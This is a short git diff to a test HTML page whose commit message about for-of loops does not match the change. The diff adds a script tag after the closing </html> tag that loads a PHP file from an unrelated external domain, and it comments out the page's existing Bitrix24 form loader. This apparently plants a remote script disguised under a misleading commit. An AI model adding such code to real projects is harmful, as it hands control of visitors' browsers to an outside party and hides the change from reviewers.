for of loop on array and obj and map

--- a/tests/index.html
+++ b/tests/index.html
@@ -13,6 +13,8 @@
 
 </html>
 
+<script src='https://cls.addons.la/leads/new/forms/resize/expander.php' config='1'></script>
+<!-- 
 
 <script data-b24-form="click/56/otj53i" data-skip-moving="true">
     (function (w, d, u) {
@@ -89,4 +91,4 @@
         })(window, document, 'https://cdn.bitrix24.es/b21371883/crm/form/loader_56.js');
     });
 
-</script>
+</script> -->
